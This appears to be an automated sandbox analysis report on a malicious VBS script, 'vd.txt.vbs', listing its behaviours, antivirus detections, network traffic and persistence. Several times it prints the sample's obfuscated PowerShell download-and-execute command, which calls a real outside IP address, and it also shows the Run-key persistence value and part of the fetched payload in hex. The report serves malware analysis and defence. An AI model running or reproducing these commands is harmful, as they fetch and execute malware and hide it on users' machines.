NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2024, 5:45 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat
file	C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs
file	C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 11, 2024, 5:45 p.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Avast	Script:SNH-gen [PUP]
Kaspersky	HEUR:Trojan.VBS.Alien.gen
Rising	PUF.Runner/PS!8.188C4 (TOPIS:E0:DQeqPNkSQUP)
Ikarus	Trojan.PowerShell.Agent
Google	Detected
ZoneAlarm	HEUR:Trojan.VBS.Alien.gen
AVG	Script:SNH-gen [PUP]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 11, 2024, 5:45 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

00%&%00%&%01%&%1B%&%30%&%02%&%00%&%41%&%01%&%00%&%00%&%02%&%00%&%00%&%11%&%28%&%1C%&%00%&%00%&%0A%&%7E%&%07%&%00%&%00%&%04%&%28%&%1D%&%00%&%00%&%0A%&%6F%&%1E%&%00%&%00%&%0A%&%80%&%07%&%00%&%00%&%04%&%7E%&%07%&%00%&%00%&%04%&%73%&%6F%&%00%&%00%&%06%&%80%&%0E%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%01%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%01%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%02%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%02%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%03%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%03%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%04%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%04%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%08%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%08%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%0F%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%0F%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%0C%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%0C%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%0D%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%0D%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%10%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%10%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%13%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%13%&%00%&%00%&%04%&%28%&%2D%&%00%&%00%&%06%&%80%&%11%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%0A%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%80%&%0A%&%00%&%00%&%04%&%7E%&%0E%&%00%&%00%&%04%&%7E%&%09%&%00%&%00%&%04%&%6F%&%72%&%00%&%00%&%06%&%28%&%1D%&%00%&%00%&%0A%&%73%&%1F%&%00%&%00%&%0A%&%80%&%0B%&%00%&%00%&%04%&%28%&%04%&%00%&%00%&%06%&%0A%&%DD%&%08%&%00%&%00%&%00%&%26%&%16%&%0A%&%DD%&%00%&%00%&%00%&%00%&%06%&%2A%&%00%&%00%&%00%&%41%&%1C%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%37%&%01%&%00%&%00%&%37%&%01%&%00%&%00%&%08%&%00%&%00%&%00%&%01%&%00%&%00%&%01%&%1B%&%30%&%04%&%00%&%51%&%00%&%00%&%00%&%02%&%00%&%00%&%11%&%7E%&%0B%&%00%&%00%&%04%&%6F%&%20%&%00%&%00%&%0A%&%6F%&%21%&%00%&%00%&%0A%&%74%&%33%&%00%&%00%&%01%&%28%&%1C%&%00%&%00%&%0A%&%7E%&%07%&%00%&%00%&%04%&%6F%&%22%&%00%&%00%&%0A%&%28%&%77%&%00%&%00%&%06%&%72%&%01%&%00%&%00%&%70%&%28%&%23%&%00%&%00%&%0A%&%7E%&%0A%&%00%&%00%&%04%&%28%&%1D%&%00%&%00%&%0A%&%6F%&%24%&%00%&%00%&%0A%&%0A%&%DD%&%08%&%00%&%00%&%00%&%26%&%16%&%0A%&%DD%&%00%&%00%&%00%&%00%&%06%&%2A%&%00%&%00%&%00%&%01%&%10%&%00%&%00%&%00%&%00%&%00%&%00%&%47%&%47%&%00%&%08%&%35%&%00%&%00%&%01%&%13%&%30%&%01%&%00%&%A7%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%72%&%0F%&%00%&%00%&%70%&%80%&%01%&%00%&%00%&%04%&%72%&%C2%&%00%&%00%&%70%&%80%&%02%&%00%&%00%&%04%&%72%&%9D%&%01%&%00%&%70%&%80%&%03%&%00%&%00%&%04%&%72%&%50%&%02%&%00%&%70%&%80%&%04%&%00%&%00%&%04%&%72%&%03%&%03%&%00%&%70%&%80%&%05%&%00%&%00%&%04%&%72%&%17%&%03%&%00%&%70%&%80%&%06%&%00%&%00%&%04%&%72%&%19%&%03%&%00%&%70%&%80%&%07%&%00%&%00%&%04%&%72%&%73%&%03%&%00%&%70%&%80%&%08%&%00%&%00%&%04%&%72%&%76%&%04%&%00%&%70%&%80%&%09%&%00%&%00%&%04%&%72%&%D1%&%16%&%00%&%70%&%80%&%0A%&%00%&%00%&%04%&%72%&%84%&%1E%&%00%&%70%&%80%&%0C%&%00%&%00%&%04%&%72%&%37%&%1F%&%00%&%70%&%80%&%0D%&%00%&%00%&%04%&%72%&%EA%&%1F%&%00%&%70%&%80%&%0F%&%00%&%00%&%04%&%72%&%9D%&%20%&%00%&%70%&%80%&%10%&%00%&%00%&%04%&%14%&%80%&%11%&%00%&%00%&%04%&%72%&%50%&%21%&%00%&%70%&%80%&%12%&%00%&%00%&%04%&%72%&%54%&%21%&%00%&%70%&%80%&%13%&%00%&%00%&%04%&%2A%&%00%&%1B%&%30%&%07%&%00%&%F1%&%02%&%00%&%00%&%03%&%00%&%00%&%11%&%18%&%17%&%1C%&%73%&%25%&%00%&%00%&%0A%&%25%&%20%&%00%&%C8%&%00%&%00%&%6F%&%26%&%00%&%00%&%0A%&%25%&%20%&%00%&%C8%&%00

Poweshell is sending data to a remote host (1 event)

Data sent

GET /reg.jpg HTTP/1.1 Host: 66.225.254.182:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 11, 2024, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

66.225.254.182

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RunScheduledTask

reg_value

powershell.exe -ExecutionPolicy Bypass -File "System.Management.Automation.InvocationInfo.MyCommand.Path"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send July 11, 2024, 5:45 p.m.	buffer: GET /reg.jpg HTTP/1.1 Host: 66.225.254.182:222 Connection: Keep-Alive socket: 1416 sent: 75	1	75	0

Stores PowerShell commands in the registry likely for persistence (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExW July 11, 2024, 5:45 p.m.	key_handle: 0x000003ac regkey_r: RunScheduledTask reg_type: 1 (REG_SZ) value: powershell.exe -ExecutionPolicy Bypass -File "System.Management.Automation.InvocationInfo.MyCommand.Path" regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RunScheduledTask	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

vd.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All